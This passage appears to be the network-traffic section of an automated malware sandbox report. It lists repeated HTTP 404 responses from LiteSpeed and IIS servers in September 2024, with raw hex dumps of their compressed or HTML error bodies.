74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 3da_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Tue, 24 Sep 2024 09:28:10 GMTserver: LiteSpeedData Raw: 35 38 35 38 0d 0a f4 ff 1f 22 2a 7b 3f 9c 19 29 5a 3d 04 34 52 16 ce df 3f 03 c7 f5 58 e7 fd e7 9b 69 7d b7 ab e6 e3 ff 99 2a 77 8b 36 00 01 e0 21 89 1a 29 71 12 7b ae c3 93 99 dd 75 f7 aa 20 f2 91 82 1b 04 18 00 d4 11 0e ff 7c 53 ed 5b 9a f1 c7 ff 5b 64 1c c7 5b 02 c4 49 80 8e c4 1e 6e ba 97 bd 71 8f db 3b 5c 88 84 44 da 10 c1 02 90 64 25 e3 bf f7 7d b5 ca 65 c7 b9 68 e2 49 67 d6 f8 8c 16 5c e3 7c 64 7c 74 cc 0d de 37 55 fb 01 30 00 08 06 00 c8 00 34 01 41 30 70 3a e7 5c f7 fe fb 86 00 8d 16 04 29 89 14 a9 6e aa 2d 7d b3 8d a5 44 8d 71 2e db 20 b4 94 da 39 75 af 71 e1 44 9b 64 0f c4 18 a8 d7 d9 b0 c3 ad 8d b4 e1 e6 d9 6c 63 56 e3 f5 2f 75 25 84 10 52 68 ab e8 32 ac e9 b9 5f b7 bf a5 01 42 08 90 8f ea 1e 43 ad fb b1 da df d7 28 e0 26 46 19 ed 63 a8 75 bd fb 35 9b c4 81 8a 68 1c 88 34 a4 12 a0 ae af 60 67 ec cd f2 55 6f bf 4f d0 d2 9f bf 24 07 4e 2e ef 31 5e 26 ff fe 80 71 9f 1c fb dd 85 2d b0 aa c7 7d 22 2c a5 84 1c 3e 8a 7a d7 3e e9 45 04 0e f4 fe 6f 1c 0d b5 32 b8 17 c9 e1 37 6f 1e e0 b7 46 db 57 f0 68 f6 c9 e0 5d ab 0d 0e 57 7c 0f 43 b5 5a 75 fd d0 31 e7 bb d5 ad b5 2b 21 92 03 c4 15 34 3c e6 c9 bb 93 8b e1 e9 63 d9 93 75 d7 ce 3f 4e e0 84 6f 0b 9f 60 75 78 f3 e6 e1 e8 f8 f2 1a 18 5f e6 a0 23 82 0e e0 86 a8 7b fd 2b 36 70 d5 f1 7c f9 8f 77 f9 5f a7 42 84 2f 9f fe 06 e7 8c 3b 16 2e 32 63 19 50 20 e9 b2 bb 53 21 de 3c 80 e7 b8 3a df 0c 1e 43 58 81 df 2d ac 02 ba 15 50 7a 78 23 fc b7 fb bb ea 10 ac 8b b0 7e d7 db 51 f8 cb 1d 7e 30 ae 3b 15 5b f7 9b 73 59 6a b1 b8 a2 71 b5 32 c8 d0 77 00 da e3 cf 5f 12 58 45 01 6c f2 7b 50 ba 61 48 bc 82 61 c4 6b 85 b3 18 5c 0d e2 7d c0 7d 22 57 87 9a e6 c3 b7 e0 ac a8 01 83 8e a1 a1 3e 63 af e8 91 f5 e7 92 c3 94 7c 9f 9b dd b7 98 54 05 8b 60 47 30 e7 bb 84 24 df 43 bf fc d5 d7 29 f9 3e de 07 4c aa e4 3f 78 fa a2 23 26 24 f9 5e 37 71 1f a3 6d 9b 71 2e d7 ab a7 3d 46 66 ec 76 ff 75 b5 78 7e ce 4d 49 48 32 7a f3 67 22 21 49 76 db 55 36 67 48 d2 e0 c7 a4 76 36 ec d8 ff 38 df fc dd 63 08 50 42 53 4f bb 9a a8 72 a7 57 28 7e 65 d4 ee 64 26 89 6a 8e 7e ac 53 92 d9 e5 f3 22 52 e0 61 24 89 ca 77 18 d3 22 a0 e7 f8 64 a3 bf ff dd 69 1b 73 f9 4e f9 17 f6 83 51 11 09 d9 f5 5d d8 4f 27 7d fc f1 1e 23 fa fe 18 a2 d7 b6 9b 93 99 24 bf 8c e8 ef 54 db 61 8c 49 95 58 0c d4 28 4f b4 85 c9 fc 42 12 6d ad cf 58 52 59 8a 45 33 a1 53 19 98 04 05 57 e1 62 d9 05 13 5f 9c 7c 3e 05 c9 ae f7 fb 1f 7a d5 e1 df 4e df b0 8e 09 dd f1 e4 91 84 ee 5b 19 d7 b9 d3 36 0e be 22 6a c7 75 a0 7a fb 91 ad c6 c1 38 d5 84 95 e4 32 5f f1 ed ea e6 1d 7c a4 14 c5 5a Data Ascii: 5858"*{?)Z=4R?
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 3da_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Tue, 24 Sep 2024 09:28:13 GMTserver: LiteSpeedData Raw: 35 38 35 38 0d 0a f4 ff 1f 22 2a 7b 3f 9c 19 29 5a 3d 04 34 52 16 ce df 3f 03 c7 f5 58 e7 fd e7 9b 69 7d b7 ab e6 e3 ff 99 2a 77 8b 36 00 01 e0 21 89 1a 29 71 12 7b ae c3 93 99 dd 75 f7 aa 20 f2 91 82 1b 04 18 00 d4 11 0e ff 7c 53 ed 5b 9a f1 c7 ff 5b 64 1c c7 5b 02 c4 49 80 8e c4 1e 6e ba 97 bd 71 8f db 3b 5c 88 84 44 da 10 c1 02 90 64 25 e3 bf f7 7d b5 ca 65 c7 b9 68 e2 49 67 d6 f8 8c 16 5c e3 7c 64 7c 74 cc 0d de 37 55 fb 01 30 00 08 06 00 c8 00 34 01 41 30 70 3a e7 5c f7 fe fb 86 00 8d 16 04 29 89 14 a9 6e aa 2d 7d b3 8d a5 44 8d 71 2e db 20 b4 94 da 39 75 af 71 e1 44 9b 64 0f c4 18 a8 d7 d9 b0 c3 ad 8d b4 e1 e6 d9 6c 63 56 e3 f5 2f 75 25 84 10 52 68 ab e8 32 ac e9 b9 5f b7 bf a5 01 42 08 90 8f ea 1e 43 ad fb b1 da df d7 28 e0 26 46 19 ed 63 a8 75 bd fb 35 9b c4 81 8a 68 1c 88 34 a4 12 a0 ae af 60 67 ec cd f2 55 6f bf 4f d0 d2 9f bf 24 07 4e 2e ef 31 5e 26 ff fe 80 71 9f 1c fb dd 85 2d b0 aa c7 7d 22 2c a5 84 1c 3e 8a 7a d7 3e e9 45 04 0e f4 fe 6f 1c 0d b5 32 b8 17 c9 e1 37 6f 1e e0 b7 46 db 57 f0 68 f6 c9 e0 5d ab 0d 0e 57 7c 0f 43 b5 5a 75 fd d0 31 e7 bb d5 ad b5 2b 21 92 03 c4 15 34 3c e6 c9 bb 93 8b e1 e9 63 d9 93 75 d7 ce 3f 4e e0 84 6f 0b 9f 60 75 78 f3 e6 e1 e8 f8 f2 1a 18 5f e6 a0 23 82 0e e0 86 a8 7b fd 2b 36 70 d5 f1 7c f9 8f 77 f9 5f a7 42 84 2f 9f fe 06 e7 8c 3b 16 2e 32 63 19 50 20 e9 b2 bb 53 21 de 3c 80 e7 b8 3a df 0c 1e 43 58 81 df 2d ac 02 ba 15 50 7a 78 23 fc b7 fb bb ea 10 ac 8b b0 7e d7 db 51 f8 cb 1d 7e 30 ae 3b 15 5b f7 9b 73 59 6a b1 b8 a2 71 b5 32 c8 d0 77 00 da e3 cf 5f 12 58 45 01 6c f2 7b 50 ba 61 48 bc 82 61 c4 6b 85 b3 18 5c 0d e2 7d c0 7d 22 57 87 9a e6 c3 b7 e0 ac a8 01 83 8e a1 a1 3e 63 af e8 91 f5 e7 92 c3 94 7c 9f 9b dd b7 98 54 05 8b 60 47 30 e7 bb 84 24 df 43 bf fc d5 d7 29 f9 3e de 07 4c aa e4 3f 78 fa a2 23 26 24 f9 5e 37 71 1f a3 6d 9b 71 2e d7 ab a7 3d 46 66 ec 76 ff 75 b5 78 7e ce 4d 49 48 32 7a f3 67 22 21 49 76 db 55 36 67 48 d2 e0 c7 a4 76 36 ec d8 ff 38 df fc dd 63 08 50 42 53 4f bb 9a a8 72 a7 57 28 7e 65 d4 ee 64 26 89 6a 8e 7e ac 53 92 d9 e5 f3 22 52 e0 61 24 89 ca 77 18 d3 22 a0 e7 f8 64 a3 bf ff dd 69 1b 73 f9 4e f9 17 f6 83 51 11 09 d9 f5 5d d8 4f 27 7d fc f1 1e 23 fa fe 18 a2 d7 b6 9b 93 99 24 bf 8c e8 ef 54 db 61 8c 49 95 58 0c d4 28 4f b4 85 c9 fc 42 12 6d ad cf 58 52 59 8a 45 33 a1 53 19 98 04 05 57 e1 62 d9 05 13 5f 9c 7c 3e 05 c9 ae f7 fb 1f 7a d5 e1 df 4e df b0 8e 09 dd f1 e4 91 84 ee 5b 19 d7 b9 d3 36 0e be 22 6a c7 75 a0 7a fb 91 ad c6 c1 38 d5 84 95 e4 32 5f f1 ed ea e6 1d 7c a4 14 c5 5a Data Ascii: 5858"*{?)Z=4R?
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 3da_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Tue, 24 Sep 2024 09:28:16 GMTserver: LiteSpeedData Raw: 35 38 35 38 0d 0a f4 ff 1f 22 2a 7b 3f 9c 19 29 5a 3d 04 34 52 16 ce df 3f 03 c7 f5 58 e7 fd e7 9b 69 7d b7 ab e6 e3 ff 99 2a 77 8b 36 00 01 e0 21 89 1a 29 71 12 7b ae c3 93 99 dd 75 f7 aa 20 f2 91 82 1b 04 18 00 d4 11 0e ff 7c 53 ed 5b 9a f1 c7 ff 5b 64 1c c7 5b 02 c4 49 80 8e c4 1e 6e ba 97 bd 71 8f db 3b 5c 88 84 44 da 10 c1 02 90 64 25 e3 bf f7 7d b5 ca 65 c7 b9 68 e2 49 67 d6 f8 8c 16 5c e3 7c 64 7c 74 cc 0d de 37 55 fb 01 30 00 08 06 00 c8 00 34 01 41 30 70 3a e7 5c f7 fe fb 86 00 8d 16 04 29 89 14 a9 6e aa 2d 7d b3 8d a5 44 8d 71 2e db 20 b4 94 da 39 75 af 71 e1 44 9b 64 0f c4 18 a8 d7 d9 b0 c3 ad 8d b4 e1 e6 d9 6c 63 56 e3 f5 2f 75 25 84 10 52 68 ab e8 32 ac e9 b9 5f b7 bf a5 01 42 08 90 8f ea 1e 43 ad fb b1 da df d7 28 e0 26 46 19 ed 63 a8 75 bd fb 35 9b c4 81 8a 68 1c 88 34 a4 12 a0 ae af 60 67 ec cd f2 55 6f bf 4f d0 d2 9f bf 24 07 4e 2e ef 31 5e 26 ff fe 80 71 9f 1c fb dd 85 2d b0 aa c7 7d 22 2c a5 84 1c 3e 8a 7a d7 3e e9 45 04 0e f4 fe 6f 1c 0d b5 32 b8 17 c9 e1 37 6f 1e e0 b7 46 db 57 f0 68 f6 c9 e0 5d ab 0d 0e 57 7c 0f 43 b5 5a 75 fd d0 31 e7 bb d5 ad b5 2b 21 92 03 c4 15 34 3c e6 c9 bb 93 8b e1 e9 63 d9 93 75 d7 ce 3f 4e e0 84 6f 0b 9f 60 75 78 f3 e6 e1 e8 f8 f2 1a 18 5f e6 a0 23 82 0e e0 86 a8 7b fd 2b 36 70 d5 f1 7c f9 8f 77 f9 5f a7 42 84 2f 9f fe 06 e7 8c 3b 16 2e 32 63 19 50 20 e9 b2 bb 53 21 de 3c 80 e7 b8 3a df 0c 1e 43 58 81 df 2d ac 02 ba 15 50 7a 78 23 fc b7 fb bb ea 10 ac 8b b0 7e d7 db 51 f8 cb 1d 7e 30 ae 3b 15 5b f7 9b 73 59 6a b1 b8 a2 71 b5 32 c8 d0 77 00 da e3 cf 5f 12 58 45 01 6c f2 7b 50 ba 61 48 bc 82 61 c4 6b 85 b3 18 5c 0d e2 7d c0 7d 22 57 87 9a e6 c3 b7 e0 ac a8 01 83 8e a1 a1 3e 63 af e8 91 f5 e7 92 c3 94 7c 9f 9b dd b7 98 54 05 8b 60 47 30 e7 bb 84 24 df 43 bf fc d5 d7 29 f9 3e de 07 4c aa e4 3f 78 fa a2 23 26 24 f9 5e 37 71 1f a3 6d 9b 71 2e d7 ab a7 3d 46 66 ec 76 ff 75 b5 78 7e ce 4d 49 48 32 7a f3 67 22 21 49 76 db 55 36 67 48 d2 e0 c7 a4 76 36 ec d8 ff 38 df fc dd 63 08 50 42 53 4f bb 9a a8 72 a7 57 28 7e 65 d4 ee 64 26 89 6a 8e 7e ac 53 92 d9 e5 f3 22 52 e0 61 24 89 ca 77 18 d3 22 a0 e7 f8 64 a3 bf ff dd 69 1b 73 f9 4e f9 17 f6 83 51 11 09 d9 f5 5d d8 4f 27 7d fc f1 1e 23 fa fe 18 a2 d7 b6 9b 93 99 24 bf 8c e8 ef 54 db 61 8c 49 95 58 0c d4 28 4f b4 85 c9 fc 42 12 6d ad cf 58 52 59 8a 45 33 a1 53 19 98 04 05 57 e1 62 d9 05 13 5f 9c 7c 3e 05 c9 ae f7 fb 1f 7a d5 e1 df 4e df b0 8e 09 dd f1 e4 91 84 ee 5b 19 d7 b9 d3 36 0e be 22 6a c7 75 a0 7a fb 91 ad c6 c1 38 d5 84 95 e4 32 5f f1 ed ea e6 1d 7c a4 14 c5 5a Data Ascii: 5858"*{?)Z=4R?
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 24 Sep 2024 09:28:51 GMTConnection: closeContent-Length: 4953Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 24 Sep 2024 09:28:54 GMTConnection: closeContent-Length: 4953Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 24 Sep 2024 09:28:57 GMTConnection: closeContent-Length: 4953Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 24 Sep 2024 09:28:59 GMTConnection: closeContent-Length: 5093Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 